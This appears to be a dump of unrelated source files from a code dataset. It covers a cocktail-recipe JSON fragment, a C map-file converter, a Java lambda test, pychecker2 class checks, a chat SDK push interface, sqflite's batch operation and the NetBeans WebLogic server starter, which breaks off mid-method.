"measure": "shot",
"ingredient": "double cream"
},
{
"quantity": "half",
"measure": "tsp",
"ingredient": "sugar"
}
],
"directions": [
"Fill the shot glass 3 quarters full with Chambord",
"Top up the shot with cream",
"Sprinkle a little sugar on top, knock it back and enjoy!"
],
"image": "jammy-dodger-shot.jpg",
"keywords": [
"blackberry liqueur",
"sugar",
"shot",
"blackberry"
]
}
| 479 |
504 | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc,char *argv[])
{
char *buf = NULL;
char *p,*label,*proc;
size_t len = 0;
unsigned short seg,seg_valid;
unsigned short ofs;
int nread = 0;
FILE *f = fopen(argv[1], "r");
seg=0; // No segment read yet
seg_valid=0;
while((nread = getline(&buf,&len,f)) != -1)
{
if(strncmp(buf,"Segment ",8)==0)
{
if(strstr(buf,"type public") || strstr(buf,"type resource") ||
strstr(buf,"type lmem"))
{
seg++;
seg_valid=seg;
}
else
seg_valid=0;
}
else if(strncmp(buf,"protocol:",9)==0)
{
strtok(buf,"\n");
printf("; %s\n", buf);
}
else
{
label=strtok(buf," : ");
p = strtok(NULL, "\n");
if (p == NULL) continue;
proc=strstr(p,"procedure at ");
/* translate procedure entries */
if(seg_valid && proc)
{
ofs=(unsigned)strtol(proc+13,&p,16);
printf("C %u %x %s\n",seg_valid,ofs,label);
}
/* translate variable entries */
proc=strstr(p,"variable at ");
if(seg_valid && proc)
{
ofs=(unsigned)strtol(proc+12,&p,16);
printf("D %u %x %s\n",seg_valid,ofs,label);
}
}
fflush(stdout);
}
return 0; // no error
}
| 1,087 |
343 | class InvokeDynamicTest
{
interface InterfaceTest
{
public String callee(String name);
}
public static void main(String[] args)
{
InterfaceTest it = v -> { return "Hello" + v; };
System.out.println(it.callee(" World!"));
}
} | 111 |
450 | from pychecker2.Check import Check
from pychecker2.Check import Warning
from pychecker2 import symbols
from pychecker2.util import *
from compiler.misc import mangle
from compiler import ast, walk
_ignorable = {}
for ignore in ['repr', 'dict', 'class', 'doc', 'str']:
_ignorable['__%s__' % ignore] = 1
class GetDefs(BaseVisitor):
"Record definitions of a attribute of self, who's name is provided"
def __init__(self, name):
self.selfname = name
self.result = {}
def visitAssAttr(self, node):
if isinstance(node.expr, ast.Name) and \
node.expr.name == self.selfname and \
isinstance(node.parent, (ast.Assign, ast.AssTuple)):
self.result[node.attrname] = node
def visitClass(self, node): # ignore nested classes
pass
class GetRefs(BaseVisitor):
"Record references to a attribute of self, who's name is provided"
def __init__(self, name):
self.selfname = name
self.result = {}
def visitAssAttr(self, node):
if isinstance(node.expr, ast.Name) and \
node.expr.name == self.selfname and \
not isinstance(node.parent, (ast.Assign, ast.AssTuple)):
self.result[node.attrname] = node
self.visitChildren(node)
def visitGetattr(self, node):
if isinstance(node.expr, ast.Name) and \
node.expr.name == self.selfname:
self.result[node.attrname] = node
self.visitChildren(node)
def visitClass(self, node): # ignore nested classes
pass
def _get_methods(class_scope):
return type_filter(class_scope.get_children(), symbols.FunctionScope)
class NotSimpleName(Exception): pass
# compress Getattr(Getattr(Name(x), y), z) -> "x.y.z"
def get_name(node):
if isinstance(node, ast.Getattr):
return get_name(node.expr) + (node.attrname, )
elif isinstance(node, ast.Name):
return (node.name,)
else:
raise NotSimpleName
def get_base_names(scope):
names = []
for b in scope.node.bases:
try:
names.append(get_name(b))
except NotSimpleName: # FIXME: hiding expressions
pass
return names
def find_in_module(package, remotename, names, checker):
# No other names, must be a name from the module
if not names:
f = checker.check_module(package)
if f:
return find_scope_going_down(f.root_scope, [remotename], checker)
return None
# complex name lookup
try:
# first, get the real name of the package
name = package.__name__
module = __import__(name, globals(), {}, [''])
except AttributeError:
# ok, so its a fake module... go with that
module = package
if remotename:
name += "." + remotename
# now import it, and chase down any other modules
submodule = getattr(module, names[0], None)
if type(submodule) == type(symbols):
return find_in_module(submodule, None, names[1:], checker)
# object in the module is not another module, so chase down the source
f = checker.check_module(submodule)
if f:
return find_scope_going_down(f.root_scope, names, checker)
return None
def find_scope_going_down(scope, names, checker):
"Drill down scopes to find definition of x.y.z"
for c in scope.get_children():
if getattr(c, 'name', '') == names[0]:
if len(names) == 1:
return c
return find_scope_going_down(c, names[1:], checker)
# Not defined here, check for import
return find_imported_class(scope.imports, names, checker)
def find_imported_class(imports, names, checker):
# may be defined by import
for i in range(1, len(names) + 1):
# try x, then x.y, then x.y.z as imported names
try:
name = ".".join(names[:i])
ref = imports[name]
# now look for the rest of the name
result = find_in_module(ref.module, ref.remotename, names[i:], checker)
if result:
return result
except (KeyError, ImportError):
pass
return None
def find_scope_going_up(scope, names, checker):
"Search up to find scope defining x of x.y.z"
for p in parents(scope):
if p.defs.has_key(names[0]):
return find_scope_going_down(p, names, checker)
# name imported via 'from module import *'
try:
return find_in_module(p.imports[names[0]].module, None, names, checker)
except KeyError:
return None
def get_base_classes(scope, checker):
result = []
for name in get_base_names(scope):
base = find_scope_going_up(scope, name, checker)
if base:
result.append(base)
result.extend(get_base_classes(base, checker))
return result
def conformsTo(a, b):
alen = len(a.node.argnames)
blen = len(b.node.argnames)
# f(a, *args, **kw) conforms to f(a, b, *args, **kw)
# f(a, *args) conforms to f(a, b, *args)
# f(a, *args) conforms to f(a, b, c)
# f(a, b, c, *args) does not conform to f(a, b)
if alen == blen:
if a.node.kwargs == b.node.kwargs and a.node.varargs == b.node.varargs:
return 1
if a.node.varargs and alen - 1 <= blen:
return a.node.kwargs == b.node.kwargs
return None
class AttributeCheck(Check):
"check `self.attr' expressions for attr"
unknownAttribute = Warning('Report unknown object attributes in methods',
'Class %s has no attribute %s')
unusedAttribute = Warning('Report attributes unused in methods',
'Attribute %s is not used in class %s')
methodRedefined = Warning('Report the redefinition of class methods',
'Method %s in class %s redefined')
signatureChanged = Warning('Report methods whose signatures do not '
'match base class methods',
'Signature does not match method '
'%s in base class %s')
attributeInitialized = \
Warning('Report attributes not initialized in __init__',
'Attribute %s is not initialized in __init__')
def check(self, file, checker):
def visit_with_self(Visitor, method):
if not method.node.argnames:
return {}
return walk(method.node, Visitor(method.node.argnames[0])).result
# for all class scopes
for node, scope in file.class_scopes():
init_attributes = None # attributes initilized in __init__
attributes = {} # "self.foo = " kinda things
methods = {} # methods -> scopes
# get attributes defined on self
for m in _get_methods(scope):
defs = visit_with_self(GetDefs, m)
if m.name == '__init__':
init_attributes = defs
attributes.update(defs)
methods[mangle(m.name, scope.name)] = m
# complain about attributes not initialized in __init__
if init_attributes is not None:
for name, node in dict_minus(attributes, init_attributes).items():
file.warning(node, self.attributeInitialized, name)
# collect inherited gunk: methods and attributes
# check for non-conformant methods
inherited_methods = scope.defs.copy()
inherited_attributes = attributes.copy()
for base in get_base_classes(scope, checker):
for m in _get_methods(base):
inherited_attributes.update(visit_with_self(GetDefs, m))
mname = mangle(m.name, base.name)
if m.name != "__init__" and \
methods.has_key(mname) and \
not conformsTo(methods[mname], m):
file.warning(methods[mname].node,
self.signatureChanged, m.name, base.name)
else:
methods[mname] = m
inherited_methods.update(base.defs)
# complain about attributes with the same name as methods
both = dict_intersect(attributes, inherited_methods)
for name, node in both.items():
file.warning(node, self.methodRedefined, name, scope.name)
# find refs on self
refs = {}
for m in _get_methods(scope):
refs.update(visit_with_self(GetRefs, m))
# Now complain about refs on self that aren't known
unknown = dict_minus(refs, inherited_methods)
unknown = dict_minus(unknown, _ignorable)
unknown = dict_minus(unknown, scope.defs)
unknown = dict_minus(unknown, inherited_attributes)
for name, node in unknown.items():
file.warning(node, self.unknownAttribute, scope.name, name)
unused = dict_minus(attributes, refs)
for name, node in unused.items():
if name.startswith('__'):
file.warning(node, self.unusedAttribute, name, scope.name)
class GetReturns(BaseVisitor):
def __init__(self):
self.result = []
def visitReturn(self, node):
self.result.append(node)
def visitFunction(self, node): pass
visitClass = visitFunction
class InitCheck(Check):
initReturnsValue = Warning('Report value returned from __init__',
'Method __init__ should not return a value')
def check(self, file, unused_checker):
for node, scope in file.class_scopes():
for m in _get_methods(scope):
if m.name == '__init__':
for r in walk(m.node.code, GetReturns()).result:
if isinstance(r.value, ast.Const) and \
r.value.value is None:
continue
if isinstance(r.value, ast.Name) and \
r.value.name == 'None':
continue
file.warning(r, self.initReturnsValue)
special = {
'__cmp__': 2, '__del__': 1, '__delitem__': 2, '__eq__': 2,
'__ge__': 2, '__getitem__': 2, '__gt__': 2, '__hash__': 1,
'__le__': 2, '__len__': 1, '__lt__': 2, '__ne__': 2,
'__nonzero__': 1, '__repr__': 1, '__setitem__': 3, '__str__': 1,
'__getattr__': 2, '__setattr__': 3,
'__delattr__': 2, '__len__': 1, '__delitem__': 2, '__iter__': 1,
'__contains__': 2,'__setslice__': 4,'__delslice__': 3,
'__add__': 2, '__sub__': 2, '__mul__': 2, '__floordiv__': 2,
'__mod__': 2, '__divmod__': 2, '__lshift__': 2,
'__rshift__': 2, '__and__': 2, '__xor__': 2, '__or__': 2,
'__div__': 2, '__truediv__': 2, '__radd__': 2, '__rsub__': 2,
'__rmul__': 2, '__rdiv__': 2, '__rmod__': 2, '__rdivmod__': 2,
'__rpow__': 2, '__rlshift__': 2, '__rrshift__': 2, '__rand__': 2,
'__rxor__': 2, '__ror__': 2, '__iadd__': 2, '__isub__': 2,
'__imul__': 2, '__idiv__': 2, '__imod__': 2, '__ilshift__': 2,
'__irshift__': 2, '__iand__': 2, '__ixor__': 2, '__ior__': 2,
'__neg__': 1, '__pos__': 1, '__abs__': 1, '__invert__': 1,
'__complex__': 1, '__int__': 1, '__long__': 1, '__float__': 1,
'__oct__': 1, '__hex__': 1, '__coerce__': 2,
'__new__': None,
'__getinitargs__': 1, '__reduce__': 1,
'__getstate__': 1,'__setstate__': 2,
'__copy__': 1, '__deepcopy__': 1,
'__pow__': 2, '__ipow__': 2, # 2 or 3
'__call__': None, # any number > 1
'__getslice__': 3, # deprecated
'__getattribute__': 2,
}
def check_special(scope):
try:
count = special[scope.name]
max_args = len(scope.node.argnames)
min_args = max_args - len(scope.node.defaults)
if min_args > count or max_args < count or \
scope.node.varargs or scope.node.kwargs:
return special[scope.name]
except KeyError:
pass
return None
class SpecialCheck(Check):
specialMethod = Warning('Report special methods with incorrect '
'number of arguments',
'The %s method requires %d argument%s, '
'including self')
notSpecial = Warning('Report methods with "__" prefix and suffix '
'which are not defined as special methods',
'The method %s is not a special method, '
'but is reserved.')
def check(self, file, unused_checker):
for node, scope in file.class_scopes():
for m in _get_methods(scope):
n = check_special(m)
if n:
file.warning(m.node, self.specialMethod, m.name, n,
n > 1 and "s" or "")
name = m.name
if name.startswith('__') and name.endswith('__') and \
name != '__init__' and not special.has_key(name):
file.warning(m.node, self.notSpecial, name)
class BackQuote(BaseVisitor):
def __init__(self, selfname):
self.results = []
self.selfname = selfname
def visitBackquote(self, node):
if isinstance(node.expr, ast.Name) and node.expr.name == self.selfname:
self.results.append(node)
class ReprCheck(Check):
backquoteSelf = Warning('Report use of `self` in __repr__ methods',
'Using `self` in __repr__')
def check(self, file, unused_checker):
for node, scope in file.class_scopes():
for m in _get_methods(scope):
if m.name == '__repr__' and m.node.argnames:
visitor = BackQuote(m.node.argnames[0])
for n in walk(m.node.code, visitor).results:
file.warning(n, self.backquoteSelf)
| 6,881 |
1,676 | package sdk.chat.core.handlers;
import java.util.Map;
import io.reactivex.Completable;
import sdk.chat.core.dao.Message;
import sdk.chat.core.push.BroadcastHandler;
/**
* Created by SimonSmiley-Andrews on 01/05/2017.
*/
public interface PushHandler {
Completable subscribeToPushChannel(String channel);
Completable unsubscribeToPushChannel(String channel);
Map<String, Object> pushDataForMessage(Message message);
void sendPushNotification (Map<String, Object> data);
BroadcastHandler getBroadcastHandler();
void setBroadcastHandler(BroadcastHandler broadcastHandler);
boolean enabled();
}
| 196 |
2,483 | <filename>sqflite/android/src/main/java/com/tekartik/sqflite/operation/BatchOperation.java
package com.tekartik.sqflite.operation;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import io.flutter.plugin.common.MethodChannel;
import static com.tekartik.sqflite.Constant.PARAM_ERROR;
import static com.tekartik.sqflite.Constant.PARAM_ERROR_CODE;
import static com.tekartik.sqflite.Constant.PARAM_ERROR_DATA;
import static com.tekartik.sqflite.Constant.PARAM_ERROR_MESSAGE;
import static com.tekartik.sqflite.Constant.PARAM_METHOD;
import static com.tekartik.sqflite.Constant.PARAM_RESULT;
/**
* Created by alex on 09/01/18.
*/
public class BatchOperation extends BaseOperation {
final Map<String, Object> map;
final BatchOperationResult operationResult = new BatchOperationResult();
final boolean noResult;
public class BatchOperationResult implements OperationResult {
// success
Object result;
// error
String errorCode;
String errorMessage;
Object errorData;
@Override
public void success(Object result) {
this.result = result;
}
@Override
public void error(String errorCode, String errorMessage, Object data) {
this.errorCode = errorCode;
this.errorMessage = errorMessage;
this.errorData = data;
}
}
public BatchOperation(Map<String, Object> map, boolean noResult) {
this.map = map;
this.noResult = noResult;
}
@Override
public String getMethod() {
return (String) map.get(PARAM_METHOD);
}
@SuppressWarnings("unchecked")
@Override
public <T> T getArgument(String key) {
return (T) map.get(key);
}
@Override
public OperationResult getOperationResult() {
return operationResult;
}
public Map<String, Object> getOperationSuccessResult() {
Map<String, Object> results = new HashMap<>();
results.put(PARAM_RESULT, operationResult.result);
return results;
}
public Map<String, Object> getOperationError() {
Map<String, Object> error = new HashMap<>();
Map<String, Object> errorDetail = new HashMap<>();
errorDetail.put(PARAM_ERROR_CODE, operationResult.errorCode);
errorDetail.put(PARAM_ERROR_MESSAGE, operationResult.errorMessage);
errorDetail.put(PARAM_ERROR_DATA, operationResult.errorData);
error.put(PARAM_ERROR, errorDetail);
return error;
}
public void handleError(MethodChannel.Result result) {
result.error(this.operationResult.errorCode, this.operationResult.errorMessage, this.operationResult.errorData);
}
@Override
public boolean getNoResult() {
return noResult;
}
public void handleSuccess(List<Map<String, Object>> results) {
if (!getNoResult()) {
results.add(getOperationSuccessResult());
}
}
public void handleErrorContinue(List<Map<String, Object>> results) {
if (!getNoResult()) {
results.add(getOperationError());
}
}
}
| 1,226 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.j2ee.weblogic9.optional;
import java.io.IOException;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.enterprise.deploy.shared.StateType;
import javax.enterprise.deploy.spi.Target;
import javax.enterprise.deploy.spi.status.ProgressObject;
import org.netbeans.api.extexecution.base.BaseExecutionDescriptor;
import org.netbeans.api.extexecution.base.input.InputProcessor;
import org.netbeans.api.extexecution.startup.StartupExtender;
import org.netbeans.modules.j2ee.deployment.plugins.api.CommonServerBridge;
import org.netbeans.modules.j2ee.deployment.plugins.api.InstanceProperties;
import org.netbeans.modules.j2ee.deployment.plugins.api.ServerDebugInfo;
import org.netbeans.modules.j2ee.deployment.plugins.api.UISupport;
import org.netbeans.modules.j2ee.deployment.plugins.spi.StartServer;
import org.netbeans.modules.j2ee.deployment.profiler.api.ProfilerSupport;
import org.netbeans.modules.j2ee.weblogic9.deploy.WLDeploymentManager;
import org.netbeans.modules.j2ee.weblogic9.WLPluginProperties;
import org.netbeans.modules.weblogic.common.api.RuntimeListener;
import org.netbeans.modules.weblogic.common.api.WebLogicRuntime;
import org.openide.util.NbBundle;
import org.openide.util.Utilities;
import org.openide.util.lookup.Lookups;
import org.openide.windows.InputOutput;
/**
*
* @author <NAME>
*/
public final class WLStartServer extends StartServer {
private static final String JAVA_VENDOR_VARIABLE = "JAVA_VENDOR"; // NOI18N
private static final String JAVA_OPTIONS_VARIABLE = "JAVA_OPTIONS"; // NOI18N
private static final String MEMORY_OPTIONS_VARIABLE= "USER_MEM_ARGS"; // NOI18N
private static final Logger LOGGER = Logger.getLogger(WLStartServer.class.getName());
/* GuardedBy(WLStartServer.class) */
private static Set<String> SERVERS_IN_DEBUG;
private final WLDeploymentManager dm;
public WLStartServer(WLDeploymentManager dm) {
this.dm = dm;
}
@Override
public ServerDebugInfo getDebugInfo(Target target) {
return new ServerDebugInfo(dm.getHost(), Integer.valueOf(
dm.getInstanceProperties().getProperty(
WLPluginProperties.DEBUGGER_PORT_ATTR)));
}
@Override
public boolean isAlsoTargetServer(Target target) {
return true;
}
@Override
public boolean isDebuggable(Target target) {
if (!dm.isRemote() && !isServerInDebug(dm.getUri())) {
return false;
}
if (!isRunning()) {
return false;
}
// XXX
return !dm.isRemote()
|| Boolean.valueOf(dm.getInstanceProperties().getProperty(WLPluginProperties.REMOTE_DEBUG_ENABLED));
}
@Override
public boolean isRunning() {
WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
return runtime.isRunning();
}
@Override
public boolean needsStartForAdminConfig() {
return true;
}
@Override
public boolean needsStartForConfigure() {
return false;
}
@Override
public boolean needsStartForTargetList() {
return true;
}
@Override
public ProgressObject startDebugging(Target target) {
LOGGER.log(Level.FINER, "Starting server in debug mode"); // NOI18N
WLServerProgress serverProgress = new WLServerProgress(this);
String serverName = dm.getInstanceProperties().getProperty(
InstanceProperties.DISPLAY_NAME_ATTR);
String uri = dm.getUri();
WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
runtime.start(new DefaultInputProcessorFactory(uri, false), new DefaultInputProcessorFactory(uri, true),
new StartListener(dm, serverName, serverProgress), getStartDebugVariables(dm), null);
addServerInDebug(uri);
return serverProgress;
}
@Override
public ProgressObject startDeploymentManager() {
LOGGER.log(Level.FINER, "Starting server"); // NOI18N
WLServerProgress serverProgress = new WLServerProgress(this);
String serverName = dm.getInstanceProperties().getProperty(
InstanceProperties.DISPLAY_NAME_ATTR);
String uri = dm.getUri();
WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
runtime.start(new DefaultInputProcessorFactory(uri, false), new DefaultInputProcessorFactory(uri, true),
new StartListener(dm, serverName, serverProgress), getStartVariables(dm), null);
removeServerInDebug(uri);
return serverProgress;
}
/* (non-Javadoc)
* @see org.netbeans.modules.j2ee.deployment.plugins.spi.StartServer#startProfiling(javax.enterprise.deploy.spi.Target, org.netbeans.modules.j2ee.deployment.profiler.api.ProfilerServerSettings)
*/
@Override
public ProgressObject startProfiling(Target target) {
LOGGER.log(Level.FINER, "Starting server in profiling mode"); // NOI18N
final WLServerProgress serverProgress = new WLServerProgress(this);
final String serverName = dm.getInstanceProperties().getProperty(
InstanceProperties.DISPLAY_NAME_ATTR);
String uri = dm.getUri();
final WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
runtime.start(new DefaultInputProcessorFactory(uri, false), new DefaultInputProcessorFactory(uri, true),
new StartListener(dm, serverName, serverProgress) {
@Override
public void onExit() {
int state = ProfilerSupport.getState();
if (state == ProfilerSupport.STATE_INACTIVE) {
serverProgress.notifyStart(StateType.FAILED,
NbBundle.getMessage(WLStartServer.class,
"MSG_START_PROFILED_SERVER_FAILED", serverName));
runtime.kill();
}
}
}, getStartProfileVariables(dm), new WebLogicRuntime.RunningCondition() {
@Override
public boolean isRunning() {
int state = ProfilerSupport.getState();
return state == ProfilerSupport.STATE_BLOCKING
|| state == ProfilerSupport.STATE_RUNNING
|| state == ProfilerSupport.STATE_PROFILING;
}
});
removeServerInDebug(uri);
return serverProgress;
}
@Override
public ProgressObject stopDeploymentManager() {
LOGGER.log(Level.FINER, "Stopping server"); // NOI18N
WLServerProgress serverProgress = new WLServerProgress(this);
String serverName = dm.getInstanceProperties().getProperty(
InstanceProperties.DISPLAY_NAME_ATTR);
String uri = dm.getUri();
WebLogicRuntime runtime = WebLogicRuntime.getInstance(dm.getCommonConfiguration());
runtime.stop(new DefaultInputProcessorFactory(uri, false), new DefaultInputProcessorFactory(uri, true),
new StopListener(dm, serverName, serverProgress));
removeServerInDebug(uri);
return serverProgress;
}
@Override
public boolean supportsStartDeploymentManager() {
return !dm.isRemote();
}
@Override
public boolean supportsStartProfiling( Target target ) {
return !dm.isRemote();
}
@Override
public boolean supportsStartDebugging(Target target) {
//if we can start it we can debug it
return supportsStartDeploymentManager();
}
@Override
public boolean needsRestart(Target target) {
return dm.isRestartNeeded();
}
private static synchronized void addServerInDebug(String uri) {
if (SERVERS_IN_DEBUG == null) {
SERVERS_IN_DEBUG = new HashSet<String>(1);
}
SERVERS_IN_DEBUG.add(uri);
}
private static synchronized void removeServerInDebug(String uri) {
if (SERVERS_IN_DEBUG == null) {
return;
}
SERVERS_IN_DEBUG.remove(uri);
}
private static synchronized boolean isServerInDebug(String uri) {
return SERVERS_IN_DEBUG != null && SERVERS_IN_DEBUG.contains(uri);
}
private static Map<String, String> getStartVariables(WLDeploymentManager dm) {
Map<String, String> ret = new HashMap<String, String>();
String javaOpts = dm.getInstanceProperties().getProperty(WLPluginProperties.JAVA_OPTS);
StringBuilder sb = new StringBuilder((javaOpts != null && javaOpts.trim().length() > 0)
? javaOpts.trim() : "");
for (StartupExtender args : StartupExtender.getExtenders(
Lookups.singleton(CommonServerBridge.getCommonInstance(dm.getUri())), StartupExtender.StartMode.NORMAL)) {
for (String singleArg : args.getArguments()) {
sb.append(' ').append(singleArg);
}
}
configureProxy(dm.getInstanceProperties(), ret, sb);
if (sb.length() > 0) {
ret.put(JAVA_OPTIONS_VARIABLE, sb.toString());
}
String vendor = dm.getInstanceProperties().getProperty(WLPluginProperties.VENDOR);
if (vendor != null && vendor.trim().length() > 0) {
ret.put(JAVA_VENDOR_VARIABLE, vendor.trim());
}
String memoryOptions = dm.getInstanceProperties().getProperty(
WLPluginProperties.MEM_OPTS);
if (memoryOptions != null && memoryOptions.trim().length() > 0) {
ret.put(MEMORY_OPTIONS_VARIABLE, memoryOptions.trim());
}
return ret;
}
private static Map<String, String> getStartDebugVariables(WLDeploymentManager dm) {
Map<String, String> ret = new HashMap<String, String>();
int debugPort = 4000;
debugPort = Integer.parseInt(dm.getInstanceProperties().getProperty(
WLPluginProperties.DEBUGGER_PORT_ATTR));
StringBuilder javaOptsBuilder = new StringBuilder();
String javaOpts = dm.getInstanceProperties().getProperty(
WLPluginProperties.JAVA_OPTS);
if (javaOpts != null && javaOpts.trim().length() > 0) {
javaOptsBuilder.append(javaOpts.trim());
}
if (javaOptsBuilder.length() > 0) {
javaOptsBuilder.append(" ");// NOI18N
}
javaOptsBuilder.append("-agentlib:jdwp=server=y,suspend=n,transport=dt_socket,address="); // NOI18N
javaOptsBuilder.append(debugPort);
for (StartupExtender args : StartupExtender.getExtenders(
Lookups.singleton(CommonServerBridge.getCommonInstance(dm.getUri())), StartupExtender.StartMode.DEBUG)) {
for (String singleArg : args.getArguments()) {
javaOptsBuilder.append(' ').append(singleArg);
}
}
configureProxy(dm.getInstanceProperties(), ret, javaOptsBuilder);
if (javaOptsBuilder.length() > 0) {
ret.put(JAVA_OPTIONS_VARIABLE, javaOptsBuilder.toString());
}
String memoryOptions = dm.getInstanceProperties().getProperty(
WLPluginProperties.MEM_OPTS);
if (memoryOptions != null && memoryOptions.trim().length() > 0) {
ret.put(MEMORY_OPTIONS_VARIABLE, memoryOptions.trim());
}
return ret;
}
private static Map<String, String> getStartProfileVariables(WLDeploymentManager dm) {
Map<String, String> ret = new HashMap<String, String>();
StringBuilder javaOptsBuilder = new StringBuilder();
String javaOpts = dm.getInstanceProperties().getProperty(
WLPluginProperties.JAVA_OPTS);
if (javaOpts != null && javaOpts.trim().length() > 0) {
javaOptsBuilder.append(" "); // NOI18N
javaOptsBuilder.append(javaOpts.trim());
}
for (StartupExtender args : StartupExtender.getExtenders(
Lookups.singleton(CommonServerBridge.getCommonInstance(dm.getUri())), StartupExtender.StartMode.PROFILE)) {
for (String singleArg : args.getArguments()) {
javaOptsBuilder.append(' ').append(singleArg);
}
}
configureProxy(dm.getInstanceProperties(), ret, javaOptsBuilder);
String toAdd = javaOptsBuilder.toString().trim();
if (!toAdd.isEmpty()) {
ret.put(JAVA_OPTIONS_VARIABLE, toAdd);
}
return ret;
}
private static void configureProxy(InstanceProperties props, Map<String, String> env, StringBuilder javaOpts) {
if (Boolean.valueOf(props.getProperty(WLPluginProperties.PROXY_ENABLED))) {
configureProxy(javaOpts);
} else {
env.put("http_proxy", ""); // NOI18N
}
}
private static StringBuilder configureProxy(StringBuilder sb) {
final String[] PROXY_PROPS = {
"http.proxyHost", // NOI18N
"http.proxyPort", // NOI18N
"https.proxyHost", // NOI18N
"https.proxyPort", // NOI18N
};
for (String prop : PROXY_PROPS) {
if (sb.indexOf(prop) < 0) {
String value = System.getProperty(prop);
if (value != null) {
if (sb.length() > 0) {
sb.append(' '); // NOI18N
}
sb.append(" -D").append(prop).append("=").append(value); // NOI18N
}
}
}
appendNonProxyHosts(sb);
return sb;
}
private static StringBuilder appendNonProxyHosts(StringBuilder sb) {
if (sb.indexOf(NonProxyHostsHelper.HTTP_NON_PROXY_HOSTS) < 0) { // NOI18N
String nonProxyHosts = NonProxyHostsHelper.getNonProxyHosts();
if (!nonProxyHosts.isEmpty()) {
if (sb.length() > 0) {
sb.append(' '); // NOI18N
}
sb.append("-D"); // NOI18N
sb.append(NonProxyHostsHelper.HTTP_NON_PROXY_HOSTS);
sb.append("="); // NOI18N
sb.append('"').append(nonProxyHosts).append('"'); // NOI18N
}
}
return sb;
}
private static class DefaultInputProcessorFactory implements BaseExecutionDescriptor.InputProcessorFactory {
private final String uri;
private final boolean error;
public DefaultInputProcessorFactory(String uri, boolean error) {
this.uri = uri;
this.error = error;
}
@Override
public InputProcessor newInputProcessor() {
InputOutput io = UISupport.getServerIO(uri);
if (io == null) {
return null;
}
return org.netbeans.api.extexecution.print.InputProcessors.printing(
error ? io.getErr() : io.getOut(), new ErrorLineConvertor(), true);
}
}
private static class StartListener implements RuntimeListener {
private final WLDeploymentManager dm;
private final String serverName;
private final WLServerProgress serverProgress;
public StartListener(WLDeploymentManager dm, String serverName, WLServerProgress serverProgress) {
this.dm = dm;
this.serverName = serverName;
this.serverProgress = serverProgress;
}
@Override
public void onStart() {
serverProgress.notifyStart(StateType.RUNNING,
NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_IN_PROGRESS", serverName));
}
@Override
public void onFinish() {
// noop
}
@Override
public void onFail() {
serverProgress.notifyStart(StateType.FAILED,
NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_FAILED", serverName));
}
@Override
public void onProcessStart() {
InputOutput io = UISupport.getServerIO(dm.getUri());
if (io == null) {
return;
}
dm.getLogManager().stop();
try {
// as described in the api we reset just ouptut
io.getOut().reset();
} catch (IOException ex) {
LOGGER.log(Level.INFO, null, ex);
}
io.select();
}
@Override
public void onProcessFinish() {
InputOutput io = UISupport.getServerIO(dm.getUri());
if (io != null) {
io.getOut().close();
io.getErr().close();
}
}
@Override
public void onRunning() {
dm.setRestartNeeded(false);
serverProgress.notifyStart(StateType.COMPLETED,
NbBundle.getMessage(WLStartServer.class, "MSG_SERVER_STARTED", serverName));
}
@Override
public void onTimeout() {
serverProgress.notifyStart(StateType.FAILED,
NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_TIMEOUT"));
}
@Override
public void onInterrupted() {
serverProgress.notifyStart(StateType.FAILED,
NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_INTERRUPTED"));
}
@Override
public void onException(Exception ex) {
LOGGER.log(Level.WARNING, null, ex);
serverProgress.notifyStart(StateType.FAILED,
NbBundle.getMessage(WLStartServer.class, "MSG_START_SERVER_FAILED", serverName));
}
@Override
public void onExit() {
// noop
}
}
private static class StopListener implements RuntimeListener {
private final WLDeploymentManager dm;
private final String serverName;
private final WLServerProgress serverProgress;
public StopListener(WLDeploymentManager dm, String serverName, WLServerProgress serverProgress) {
this.dm = dm;
this.serverName = serverName;
this.serverProgress = serverProgress;
}
@Override
public void onStart() {
serverProgress.notifyStart(StateType.RUNNING,
NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_IN_PROGRESS", serverName));
}
@Override
public void onFinish() {
serverProgress.notifyStop(StateType.COMPLETED,
NbBundle.getMessage(WLStartServer.class, "MSG_SERVER_STOPPED", serverName));
}
@Override
public void onFail() {
serverProgress.notifyStop(StateType.FAILED,
NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_FAILED", serverName));
}
@Override
public void onProcessStart() {
InputOutput io = UISupport.getServerIO(dm.getUri());
if (io == null) {
return;
}
dm.getLogManager().stop();
try {
// as described in the api we reset just ouptut
io.getOut().reset();
} catch (IOException ex) {
LOGGER.log(Level.INFO, null, ex);
}
io.select();
}
@Override
public void onProcessFinish() {
InputOutput io = UISupport.getServerIO(dm.getUri());
if (io != null) {
io.getOut().close();
io.getErr().close();
}
}
@Override
public void onRunning() {
serverProgress.notifyStop(StateType.RUNNING,
NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_IN_PROGRESS", serverName));
}
@Override
public void onTimeout() {
serverProgress.notifyStop(StateType.FAILED,
NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_TIMEOUT"));
}
@Override
public void onInterrupted() {
serverProgress.notifyStart(StateType.FAILED,
NbBundle.getMessage(WLStartServer.class, "MSG_STOP_SERVER_INTERRUPTED"));
}
@Override
public void onException(Exception ex) {
LOGGER.log(Level.WARNING, null, ex);
serverProgress.notifyStart(StateType.FAILED,
